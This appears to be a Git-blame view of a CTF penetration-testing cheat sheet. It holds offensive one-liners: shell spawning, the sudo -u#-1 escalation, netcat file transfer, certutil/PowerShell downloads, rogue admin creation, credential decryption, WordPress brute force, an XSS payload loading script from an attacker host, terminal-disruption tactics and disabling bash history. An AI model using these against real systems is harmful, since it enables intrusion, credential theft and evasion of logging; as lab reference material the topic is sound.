CTF-Writeups/Cheat Sheet.md

230 lines
6.6 KiB
Markdown
Raw Normal View History

2020-09-22 16:39:22 +00:00
# Linux
### Stablilize Shell
2020-09-10 20:03:04 +00:00
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
2020-09-22 16:39:22 +00:00
### Spawn bash
2020-09-10 20:03:04 +00:00
* /usr/bin/script -qc /bin/bash 1&>/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
2020-10-18 18:16:43 +00:00
### Vulnerable sudo version
`sudo -u#-1 whoami`
2020-11-03 16:30:29 +00:00
### SMB Shares
2020-10-25 12:41:05 +00:00
#### SmbClient
2020-10-25 14:00:03 +00:00
* `smbclient -L \\\\<ip\\` listing all shares
* `smbclient \\\\<ip>\\<share>` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\<share> -U <share> `accessing a share with an authorized user
2020-10-25 13:56:23 +00:00
2020-10-25 12:41:05 +00:00
#### Smbmap
2020-10-25 13:51:30 +00:00
* `smbmap -u <username> -p <password> -H <ip>`
2020-10-18 18:16:43 +00:00
2020-10-25 13:56:23 +00:00
#### Smbget
* `smbget -R smb://<ip>/<share>`
2020-11-03 16:30:29 +00:00
### NFS shares
2020-11-03 16:29:50 +00:00
* `showmount -e <ip> ` This lists the nfs shares
* `mount -t nfs <ip>:/<share_name> <directory_where_to_mount>` Mounting that share
2020-11-03 18:48:42 +00:00
2020-11-10 16:01:18 +00:00
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u <user> -e ` Check cronjobs for a specific user
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
2020-09-22 16:39:22 +00:00
### Finding Binaries
2020-09-10 20:03:04 +00:00
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
2020-11-03 18:48:42 +00:00
### Finding File capabilites
`getcap -r / 2>/dev/null`
2020-11-16 21:55:44 +00:00
### Finding text in a files
`grep -rnw '/path/to/somewhere/' -e 'pattern'
`
2020-09-22 16:39:22 +00:00
### Changing file attributes
2020-09-10 20:05:19 +00:00
chattr + i filename `making file immutable`<br/>
chattr -i filename `making file mutable`<br/>
2020-09-10 20:04:22 +00:00
lschattr filename `Checking file attributes`
2020-09-22 16:34:15 +00:00
2020-09-28 16:13:59 +00:00
### Uploading Files
2020-09-28 16:15:10 +00:00
scp file/you/want `user@ip`:/path/to/store <br/>
2020-09-28 16:14:40 +00:00
python -m SimpleHTTPServer [port] `By default will listen on 8000`<br/>
2020-10-22 15:52:58 +00:00
python3 -m http.server [port] `By default will listen on 8000`<br/>
2020-09-28 16:13:59 +00:00
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-11-05 17:30:11 +00:00
`wget http://<ip>:port/<file>`
2020-10-26 21:33:34 +00:00
2020-11-01 16:56:22 +00:00
### Netcat to download files from target
`nc -l -p [port] > file` Receive file <br/>
`nc -w 3 [ip] [port] < file `Send file <br/>
2020-11-03 16:32:12 +00:00
### Cracaking Zip Archive
2020-11-03 17:48:36 +00:00
`fcrackzip -u -D -p <path_to_wordlist> <archive.zip>`
2020-11-03 16:32:12 +00:00
2020-11-07 15:50:46 +00:00
### Decrypting PGP key
If you have `asc` key which can be used for PGP authentication then
* john key.asc > asc_hash
* john asc_hash --wordlists=path_to_wordlist
#### Having pgp cli
* pgp --import key.asc
* pgp --decrypt file.pgp
#### Having gpg cli
* gpg --import key.asc
* gpg --decrypt file.pgp
2020-11-03 17:47:59 +00:00
### killing a running job in same shell
`jobs`
```
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
2020-11-05 16:59:26 +00:00
### SSH Port Forwarding
`ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`
2020-11-03 17:47:59 +00:00
2020-11-05 17:30:11 +00:00
### SQL Map
`sqlmap -r request.txt --dbms=mysql --dump`
2020-09-22 16:43:07 +00:00
# Windows
2020-09-22 16:34:15 +00:00
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
2020-09-22 16:43:07 +00:00
### Changing File Permissions
2020-09-22 16:45:03 +00:00
CACLS files /e /p {USERNAME}:{PERMISSION}<br/>
Permissions:<br/>
2020-09-22 16:44:32 +00:00
1.R `Read`<br/>
2.W `Write`<br/>
3.C `Change`<br/>
2020-09-22 16:43:07 +00:00
4.F `Full Control`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Set File bits
attrib +r filename `add read only bit`<br/>
attrib -r filename `remove read only bit`<br/>
attrib +h filename `add hidden bit `<br/>
attrib -h filename `remove hidden bit`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Show hidden file/folder
dir /a `show all hidden files & folder`<br/>
dir /a:d `show only hidden folder`<br/>
dir /a:h `show only hidden files`<br/>
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-10-26 21:42:27 +00:00
`certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe`<br />
2020-11-16 16:58:52 +00:00
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`<br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
2020-09-22 16:39:22 +00:00
2020-11-05 14:51:03 +00:00
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
2020-11-16 16:58:52 +00:00
## List Drives
`wmic logicaldisk get caption`
2020-11-16 20:14:59 +00:00
## Decrypting PSCredential Object
* $file = Import-Clixml -Path <path_to_file>
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
2020-10-24 15:15:04 +00:00
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
2020-09-24 18:50:52 +00:00
2020-10-24 15:15:04 +00:00
# Meterpreter
2020-09-24 18:50:52 +00:00
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
2020-11-08 16:43:56 +00:00
# Git
### Dumping repository
`./gitdumper.sh <location_of_remote_or_local_repostiory_having./.git> <destination_folder>`
### Extracting information from repository
`./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>`
2020-11-11 19:28:20 +00:00
# Wordpress
using wpscan we can find users or do some further enumeration of wordpress version
* `wpscan -e --url <ip>`
To bruteforce passwords
* `wpscan --url <ip> -U user_file_path -P password_file_path`
2020-09-22 16:39:22 +00:00
# King Of The Hill (KoTH)
2020-09-23 16:51:41 +00:00
### Monitoring and Closing Shell (Linux)
2020-09-22 16:39:22 +00:00
* strace `debugging / tamper with processes`
* gbd `c/c++ debugger`
* script - records terminal activites
* w /who `check current pts ,terminal device`
2020-10-22 15:51:56 +00:00
* ps -t ps/pts-number `process monitoring`
* script /dev/pts/pts-number `montior terminal`
2020-09-22 16:39:22 +00:00
* cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal`
* pkill -9 -t pts/pts-number
2020-10-31 15:04:52 +00:00
2020-10-31 15:18:55 +00:00
### Change SSH port
`nano /etc/ssh/sshd_config` (change PORT 22 to any port you want also you can tinker with configuration file)
2020-11-11 23:21:15 +00:00
`service sshd restart` (Restart SSH service to apply changes)
2020-10-31 15:20:31 +00:00
### Hide yourself from "w" or "who"
`ssh user@ip -T` This -T will have some limiations , that you cannot run bash and some other commands but is helpful.
2020-10-31 15:04:52 +00:00
### Run Bash script on king.txt
`while [ 1 ]; do /root/chattr -i king.txt; done &`
2020-10-22 15:51:56 +00:00
### Send messages to logged in users
* echo "msg" > /dev/pts/pts-number `send message to specific user`<br />
* wall msg `boradcast message to everyone`<br />
2020-09-23 16:51:41 +00:00
### Closing Session (Windows)
* quser
* logoff id|user_name
2020-10-09 12:19:57 +00:00
2020-11-18 16:09:04 +00:00
# Web
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
```
2020-11-13 12:04:09 +00:00
# Wordlists
### Directory Bruteforcing
* /usr/share/wordlists/dirb/big.txt
* /usr/share/wordlists/dirb/common.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
### Credential Bruteforcing
* /usr/share/wordlists/rockyou.txt
* /usr/share/wordlists/fasstrackt.txt
* using `crackstation`
* using `seclists`
2020-10-09 12:19:57 +00:00
2020-11-13 12:05:07 +00:00
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file <br/>
sudo ifconfig tun0 down<br/>
sudo ip link set tun0 down<br/>
sudo ip link delete tun0<br/>
sudo systemctl restart systemd-networkd ; sudo systemctl status systemd-networkd<br/>